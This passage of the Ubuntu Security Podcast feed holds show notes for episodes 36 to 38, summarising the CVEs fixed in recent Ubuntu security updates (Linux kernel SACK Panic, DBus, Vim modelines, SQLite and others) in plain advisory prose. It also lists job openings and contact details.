<li><a href="https://ubuntu.com/security/CVE-2019-9631">CVE-2019-9631</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9200">CVE-2019-9200</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12293">CVE-2019-12293</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10873">CVE-2019-10873</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10872">CVE-2019-10872</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10023">CVE-2019-10023</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10021">CVE-2019-10021</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10019">CVE-2019-10019</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10018">CVE-2019-10018</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20662">CVE-2018-20662</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18897">CVE-2018-18897</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9865">CVE-2017-9865</a></li>
</ul>
</li>
<li>Usual mix of issues
<ul>
<li>Memory leak</li>
<li>Stack exhaustion -&gt; crash, DoS</li>
<li>3*Heap-based buffer over-reads</li>
<li>NULL pointer dereference</li>
<li>Various floating point exception issues</li>
<li>Assertion failure</li>
<li>Heap-based buffer under-write - so write at a negative index of a heap
allocated buffer - crash, DoS or possible RCE via heap metadata or
object corruption</li>
</ul>
</li>
</ul>
<h3 id="usn-4041-1-usn-4041-2-linux-kernel-update">[<a href="https://usn.ubuntu.com/4041-1/">USN-4041-1</a>, <a href="https://usn.ubuntu.com/4041-2/">USN-4041-2</a>] Linux kernel update</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (HWE), Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11479">CVE-2019-11479</a></li>
</ul>
</li>
<li>Final SACK Panic issue (<a href="https://ubuntusecuritypodcast.org/episode-37/">Episode 37</a>) - added sysctl to easily set MSS (is
usually hard-coded to 48) - so can be increased to avoid this DoS issue</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="apparmor-interview-with-john-johansen">AppArmor interview with John Johansen</h3>
<ul>
<li><a href="https://gitlab.com/apparmor/apparmor">https://gitlab.com/apparmor/apparmor</a></li>
<li><a href="https://wiki.ubuntu.com/AppArmor">https://wiki.ubuntu.com/AppArmor</a></li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="robotics-security-engineer">Robotics Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1550997">https://boards.greenhouse.io/canonical/jobs/1550997</a></li>
</ul>
<h4 id="ubuntu-security-engineer">Ubuntu Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1723997">https://boards.greenhouse.io/canonical/jobs/1723997</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E038.mp3" length="26458606" type="audio/mpeg" /><itunes:duration>27:33</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 37
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-37/</link>
          <pubDate>Fri, 28 Jun 2019 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E037.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 37</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        The big new this week is SackPANIC! updates for the Linux kernel, plus we look at vulnerabilities in, and updates for, Samba, SQLite, Bind, Thunderbird and more, and we are hiring!
        
        ]]></itunes:subtitle>
        <itunes:summary>The big new this week is SackPANIC! updates for the Linux kernel, plus we look at vulnerabilities in, and updates for, Samba, SQLite, Bind, Thunderbird and more, and we are hiring!</itunes:summary>
        <description>The big new this week is SackPANIC! updates for the Linux kernel, plus we look at vulnerabilities in, and updates for, Samba, SQLite, Bind, Thunderbird and more, and we are hiring!</description>
        <googleplay:description>The big new this week is SackPANIC! updates for the Linux kernel, plus we look at vulnerabilities in, and updates for, Samba, SQLite, Bind, Thunderbird and more, and we are hiring!</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>The big new this week is SackPANIC! updates for the Linux kernel, plus we look at vulnerabilities in, and updates for, Samba, SQLite, Bind, Thunderbird and more, and we are hiring!</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>36 unique CVEs addressed</p>
<h3 id="usn-4017-1-usn-4017-2-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/4017-1/">USN-4017-1</a>, <a href="https://usn.ubuntu.com/4017-2/">USN-4017-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11477">CVE-2019-11477</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11478">CVE-2019-11478</a></li>
</ul>
</li>
<li>SACK Panic - will be discussed in more detail with Joe later in the show</li>
<li>Livepatch (LSN-0052-1) also available for Xenial and Bionic</li>
</ul>
<h3 id="usn-4018-1-samba-vulnerabilities">[<a href="https://usn.ubuntu.com/4018-1/">USN-4018-1</a>] Samba vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-12436">CVE-2019-12436</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12435">CVE-2019-12435</a></li>
</ul>
</li>
<li>Two DoS issues (both NULL ptr dereferences) only affecting most recent Samba versions
<ul>
<li>One in AD DC DNS mgmt server RPC process
<ul>
<li>Only an authenticated user could trigger this</li>
</ul>
</li>
<li>Other in LDAP server - user with read access to the directory could
trigger NULL ptr dereference via the paged search control</li>
</ul>
</li>
</ul>
<h3 id="usn-4019-1-usn-4019-2-sqlite-vulnerabilities">[<a href="https://usn.ubuntu.com/4019-1/">USN-4019-1</a>, <a href="https://usn.ubuntu.com/4019-2/">USN-4019-2</a>] SQLite vulnerabilities</h3>
<ul>
<li>12 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-2519">CVE-2017-2519</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-13685">CVE-2017-13685</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-10989">CVE-2017-10989</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-6153">CVE-2016-6153</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9937">CVE-2019-9937</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9936">CVE-2019-9936</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8457">CVE-2019-8457</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20506">CVE-2018-20506</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20346">CVE-2018-20346</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20505">CVE-2018-20505</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-2520">CVE-2017-2520</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-2518">CVE-2017-2518</a></li>
</ul>
</li>
<li>7 CVEs addressed in Precise ESM, Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-13685">CVE-2017-13685</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-10989">CVE-2017-10989</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-6153">CVE-2016-6153</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8457">CVE-2019-8457</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20506">CVE-2018-20506</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20346">CVE-2018-20346</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-2518">CVE-2017-2518</a></li>
</ul>
</li>
<li>Mix of various issues, most involving various memory corruption problems
<ul>
<li>UAFs, DoS (crash), heap-based buffer over-reads (crash -&gt; DoS or
possible information disclosure), incorrect use of temporary
directories, race-condition leading to NULL pointer dereference,
integer overflow -&gt; buffer overflow -&gt; crash / code execution</li>
</ul>
</li>
</ul>
<h3 id="usn-4021-1-libvirt-vulnerabilities">[<a href="https://usn.ubuntu.com/4021-1/">USN-4021-1</a>] libvirt vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3886">CVE-2019-3886</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10132">CVE-2019-10132</a></li>
</ul>
</li>
<li>DoS where some APIs in the guest agents could be accessed by read-only
users - this would cause libvirt to block and cause a DoS</li>
<li>Privilege escalation due to insecure permissions on the virt-lockd and
virt-logd UNIX domain sockets - these are created by systemd unit files
but were created as world writable - and the daemons don&rsquo;t try and
authenticate the user - so anyone could use these sockets to potentially
elevate privileges - so fixed by ensuring the systemd socket definitions
specify the right mode.</li>
</ul>
<h3 id="usn-4020-1-firefox-vulnerability">[<a href="https://usn.ubuntu.com/4020-1/">USN-4020-1</a>] Firefox vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11707">CVE-2019-11707</a></li>
</ul>
</li>
<li>Firefox 67.0.3 which fixes a remotely exploitable crash or possible code
execution problem due to type confusion in the Javascript engine -
reports this was used to target various cryptocurrency exchanges by
delivering Windows and Mac malware to them</li>
</ul>
<h3 id="usn-4024-1-evince-update">[<a href="https://usn.ubuntu.com/4024-1/">USN-4024-1</a>] Evince update</h3>
<ul>
<li>Affecting Xenial, Bionic</li>
<li>Updated the AppArmor profile for evince to ensure it restricts access to
various private file directories, and to address various issues raised by
Jann Horn of GPZ - in particular limiting access to various DBus services</li>
</ul>
<h3 id="usn-4026-1-bind-vulnerability">[<a href="https://usn.ubuntu.com/4026-1/">USN-4026-1</a>] Bind vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-6471">CVE-2019-6471</a></li>
</ul>
</li>
<li>DoS (crash due to assertion failure) caused by a race condition when
handling malformed packets</li>
</ul>
<h3 id="usn-4028-1-thunderbird-vulnerabilities">[<a href="https://usn.ubuntu.com/4028-1/">USN-4028-1</a>] Thunderbird vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11706">CVE-2019-11706</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11705">CVE-2019-11705</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11704">CVE-2019-11704</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11703">CVE-2019-11703</a></li>
</ul>
</li>
<li>Various issues in handling of iCal data - all remotely triggerable by crafted emails:
<ul>
<li>Crash due to type-confusion</li>
<li>Both a stack and 2 separate heap buffer overflows - either could
potentially be exploitable to execute arbitrary code</li>
</ul>
</li>
</ul>
<h3 id="usn-4027-1-postgresql-vulnerability">[<a href="https://usn.ubuntu.com/4027-1/">USN-4027-1</a>] PostgreSQL vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-10164">CVE-2019-10164</a></li>
</ul>
</li>
<li>&ldquo;Stack buffer overflow by setting a password&rdquo; - authenticated user could
set their password to a specially constructed value which when processed
by PostgreSQL would cause it to crash, or possible execute arbitrary code
in the context of the PostgreSQL server</li>
</ul>
<h3 id="usn-4023-1-mosquitto-vulnerabilities">[<a href="https://usn.ubuntu.com/4023-1/">USN-4023-1</a>] Mosquitto vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-7654">CVE-2017-7654</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-7653">CVE-2017-7653</a></li>
</ul>
</li>
<li>Remotely triggerable memory leak (by unauthenticated users) could be used
to crash the Mosquitto Broker -&gt; DoS</li>
<li>Different DoS where one client could cause others to be disconnected by
sending invalid an UTF-8 topic string - which would cause other clients
which do reject invalid UTF-8 to disconnect themselves</li>
</ul>
<h3 id="usn-3977-3-intel-microcode-update">[<a href="https://usn.ubuntu.com/3977-3/">USN-3977-3</a>] Intel Microcode update</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM, Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11091">CVE-2019-11091</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12126">CVE-2018-12126</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12127">CVE-2018-12127</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12130">CVE-2018-12130</a></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-32/">Episode 32</a> covered most recent Intel CPU vulnerabilities (MDS) -
mitigated by a combination of microcode and kernel updates - this
provides microcode updates for the Sandy Bridge family of Intel
processors</li>
</ul>
<h3 id="usn-4030-1-web2py-vulnerabilities">[<a href="https://usn.ubuntu.com/4030-1/">USN-4030-1</a>] web2py vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2016-3957">CVE-2016-3957</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-3954">CVE-2016-3954</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-3953">CVE-2016-3953</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-3952">CVE-2016-3952</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-10321">CVE-2016-10321</a></li>
</ul>
</li>
<li>Various issues including:
<ul>
<li>Possible RCE (was serializing encryption key info into a session
cookie) which could then be read by an attacker since it also made
session cookie accessible via an API endpoint</li>
<li>Sample web application used a hard-coded encryption key which could
also allow attackers to do RCE as they could easily interpose on the
session</li>
<li>Environment variables were exposed by an example API endpoint which
exposed host info and so remote attackers could then possibly gain
admin access</li>
<li>Lacked brute-force password protection as wouldn&rsquo;t reject already
denied hosts from repeatedly trying</li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="alex-and-joe-talk-about-the-sack-panic-issues-discovered-by-netflix">Alex and Joe talk about the SACK Panic issues discovered by Netflix</h3>
<ul>
<li><a href="https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SACKPanic">https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SACKPanic</a></li>
<li><a href="https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md">https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md</a></li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="robotics-security-engineer">Robotics Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1550997">https://boards.greenhouse.io/canonical/jobs/1550997</a></li>
</ul>
<h4 id="ubuntu-security-engineer">Ubuntu Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1723997">https://boards.greenhouse.io/canonical/jobs/1723997</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E037.mp3" length="19049025" type="audio/mpeg" /><itunes:duration>19:50</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 36
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-36/</link>
          <pubDate>Mon, 17 Jun 2019 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E036.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 36</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        Security updates for DBus, vim, elfutils, GLib and more, plus Joe and Alex look at another npm package hijack as well as some wider discussions around the big vim RCE of this week.
        
        ]]></itunes:subtitle>
        <itunes:summary>Security updates for DBus, vim, elfutils, GLib and more, plus Joe and Alex look at another npm package hijack as well as some wider discussions around the big vim RCE of this week.</itunes:summary>
        <description>Security updates for DBus, vim, elfutils, GLib and more, plus Joe and Alex look at another npm package hijack as well as some wider discussions around the big vim RCE of this week.</description>
        <googleplay:description>Security updates for DBus, vim, elfutils, GLib and more, plus Joe and Alex look at another npm package hijack as well as some wider discussions around the big vim RCE of this week.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Security updates for DBus, vim, elfutils, GLib and more, plus Joe and Alex look at another npm package hijack as well as some wider discussions around the big vim RCE of this week.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>43 unique CVEs addressed</p>
<h3 id="usn-4012-1-elfutils-vulnerabilities">[<a href="https://usn.ubuntu.com/4012-1/">USN-4012-1</a>] elfutils vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-7665">CVE-2019-7665</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7150">CVE-2019-7150</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7149">CVE-2019-7149</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18521">CVE-2018-18521</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18520">CVE-2018-18520</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18310">CVE-2018-18310</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16403">CVE-2018-16403</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16402">CVE-2018-16402</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16062">CVE-2018-16062</a></li>
</ul>
</li>
<li>Mix of issues found via fuzzing with ASAN - all resulting in crash -&gt; DoS
from crafted input files
<ul>
<li>multiple heap-based buffer over-reads in various libraries (libelf,
libdw) on crafted ELF input</li>
<li>divide-by-zero on crafted ELF input in arlib (used by ar, ranlib and
other tools to process .a archive files)</li>
<li>multiple invalid pointer dereferences</li>
<li>double-free in libelf on crafted ELF input</li>
</ul>
</li>
</ul>
<h3 id="usn-4013-1-libsndfile-vulnerabilities">[<a href="https://usn.ubuntu.com/4013-1/">USN-4013-1</a>] libsndfile vulnerabilities</h3>
<ul>
<li>13 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3832">CVE-2019-3832</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19758">CVE-2018-19758</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19662">CVE-2018-19662</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19661">CVE-2018-19661</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19432">CVE-2018-19432</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13139">CVE-2018-13139</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6892">CVE-2017-6892</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17457">CVE-2017-17457</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17456">CVE-2017-17456</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-16942">CVE-2017-16942</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14634">CVE-2017-14634</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14246">CVE-2017-14246</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14245">CVE-2017-14245</a></li>
</ul>
</li>
<li>Range of issues from crashes (DoS) to possible RCE again found via fuzzing with ASAN
<ul>
<li>Multiple heap-based buffer over-reads on crafted audio files (WAV, ALAW, AIFF) files</li>
<li>NULL pointer dereference</li>
<li>Stack-based buffer overflow - crash -&gt; DoS or possible RCE on crafted</li>
<li>Divide by zeros</li>
</ul>
</li>
</ul>
<h3 id="usn-4014-1-usn-4014-2-glib-vulnerability">[<a href="https://usn.ubuntu.com/4014-1/">USN-4014-1</a>, <a href="https://usn.ubuntu.com/4014-2/">USN-4014-2</a>] GLib vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-12450">CVE-2019-12450</a></li>
</ul>
</li>
<li>GLib contains GIO which is library to abstract file-IO operations</li>
<li>During file copying, would create the new file with default permissions
and then once copy was done would then set the correct permissions (based
on the original files permissions)</li>
<li>Could allow other users to read the file during the copy process</li>
<li>Instead fix to create new file with restrictive permissions (only
accessible by the current user) to avoid this</li>
</ul>
<h3 id="usn-4015-1-usn-4015-2-dbus-vulnerability">[<a href="https://usn.ubuntu.com/4015-1/">USN-4015-1</a>, <a href="https://usn.ubuntu.com/4015-2/">USN-4015-2</a>] DBus vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-12749">CVE-2019-12749</a></li>
</ul>
</li>
<li>DBus includes multiple authentication mechanisms - usually would just use
credentials passed via UNIX sockets (is secure as is enforced by the
kernel), but this is not supported on all platforms (Windows etc)</li>
<li>So includes another authentication mechanism - DBUS_COOKIE_SHA1
<ul>
<li>In this case, the authenticating user has to prove they are who they
say by being able to read and provide a magic value from a keyring file
which dbus drops in the user&rsquo;s home directory</li>
<li>By abusing symlinks, it would be possible to point the local users
keyring at some other file and cause DBus to read / write to some other
file which was not intended</li>
<li>This could further be abused to point your local dbus keyring to root&rsquo;s
and cause DBus to eventually confuse the local user&rsquo;s authentication to
the bus as that of the root user and so allow an unprivileged user to
authenticate as root and so then perform operations as root via DBus</li>
</ul>
</li>
<li>Fixed by simply only allowing DBUS_COOKIE_SHA1 to authenticate as the
same user as the DBus server owner - ie. if running DBus as root you can
only authenticate as root, not as your local user (since this use-case is
not actually used in practice)</li>
</ul>
<h3 id="usn-4016-1-vim-vulnerabilities">[<a href="https://usn.ubuntu.com/4016-1/">USN-4016-1</a>] Vim vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-12735">CVE-2019-12735</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-5953">CVE-2017-5953</a></li>
</ul>
</li>
<li>Most over-hyped bug of the week
<ul>
<li><a href="https://threatpost.com/linux-command-line-editors-high-severity-bug/145569/">https://threatpost.com/linux-command-line-editors-high-severity-bug/145569/</a></li>
<li><a href="https://www.reddit.com/r/netsec/comments/bwrjrx/vimneovim_arbitrary_code_execution_via_modelines/">https://www.reddit.com/r/netsec/comments/bwrjrx/vimneovim_arbitrary_code_execution_via_modelines/</a></li>
</ul>
</li>
<li>Will discuss with Joe later in the episode, but briefly:
<ul>
<li>Vim includes support for &lsquo;modelines&rsquo;
<ul>
<li>This allows files to include custom settings such as indentation, file
type etc so that editing is consistent</li>
<li>Only a subset of vim commands can be permitted - ie. set - and then not
everything can be set by modelines - and is meant to be side-effect
free</li>
<li>However, the source! command is still allowed - this reads extra
commands from a file as though typed by the user and is done so outside
the sandbox</li>
<li>So is possible to bypass the sandbox and execute arbitrary commands via
the modeline (since vim supports running external commands from the
editor itself)</li>
<li>PoC included running a reverse shell by just opening a crafted file</li>
</ul>
</li>
<li>However, modelines are disabled by default in Debian (and hence Ubuntu)
so unless a user had specifically enabled it in their own vimrc they are
safe</li>
<li>Patched to disable sourcing a file from the modeline or from within the
sandbox at all</li>
</ul>
</li>
<li>One extra low priority issue when vim could be made to crash via a
crafted spell file (this is used to store locally spelling additions etc)</li>
</ul>
<h3 id="usn-4016-2-neovim-vulnerability">[<a href="https://usn.ubuntu.com/4016-2/">USN-4016-2</a>] Neovim vulnerability</h3>
<ul>
<li>1 CVEs addressed in Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-12735">CVE-2019-12735</a></li>
</ul>
</li>
<li>See above from vim :)</li>
</ul>
<h3 id="usn-3991-3-firefox-regression">[<a href="https://usn.ubuntu.com/3991-3/">USN-3991-3</a>] Firefox regression</h3>
<ul>
<li>17 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9816">CVE-2019-9816</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11698">CVE-2019-11698</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11697">CVE-2019-11697</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9821">CVE-2019-9821</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9820">CVE-2019-9820</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9819">CVE-2019-9819</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9817">CVE-2019-9817</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9814">CVE-2019-9814</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9800">CVE-2019-9800</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7317">CVE-2019-7317</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11701">CVE-2019-11701</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11699">CVE-2019-11699</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11696">CVE-2019-11696</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11695">CVE-2019-11695</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11693">CVE-2019-11693</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11692">CVE-2019-11692</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11691">CVE-2019-11691</a></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-33/">Episode 33</a> - Firefox update to version 67.0 - contained a regression so
updated to 67.0.1 (<a href="https://ubuntusecuritypodcast.org/episode-35/">Episode 35</a>) - this also contained another regression
where Firefox would fail to load correctly if run in safe-mode. So
upstream released 67.0.2 which is this new update.</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="alex-and-joe-talk-about-another-npm-package-hijack-attack-and-the-vim-issue">Alex and Joe talk about another npm package hijack attack and the vim issue</h3>
<ul>
<li><a href="https://blog.npmjs.org/post/185397814280/plot-to-steal-cryptocurrency-foiled-by-the-npm">https://blog.npmjs.org/post/185397814280/plot-to-steal-cryptocurrency-foiled-by-the-npm</a></li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="robotics-security-engineer">Robotics Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1550997">https://boards.greenhouse.io/canonical/jobs/1550997</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E036.mp3" length="21614877" type="audio/mpeg" /><itunes:duration>22:30</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 35
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-35/</link>
          <pubDate>Tue, 11 Jun 2019 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E035.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 35</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        We look at vulnerabilities and updates for Exim, the Linux kernel, Berkeley DB, Qt and more, plus Joe and Alex discuss some recent malware campaigns including Hiddenwasp, and we cover some open positions too.
        
        ]]></itunes:subtitle>
        <itunes:summary>We look at vulnerabilities and updates for Exim, the Linux kernel, Berkeley DB, Qt and more, plus Joe and Alex discuss some recent malware campaigns including Hiddenwasp, and we cover some open positions too.</itunes:summary>
        <description>We look at vulnerabilities and updates for Exim, the Linux kernel, Berkeley DB, Qt and more, plus Joe and Alex discuss some recent malware campaigns including Hiddenwasp, and we cover some open positions too.</description>
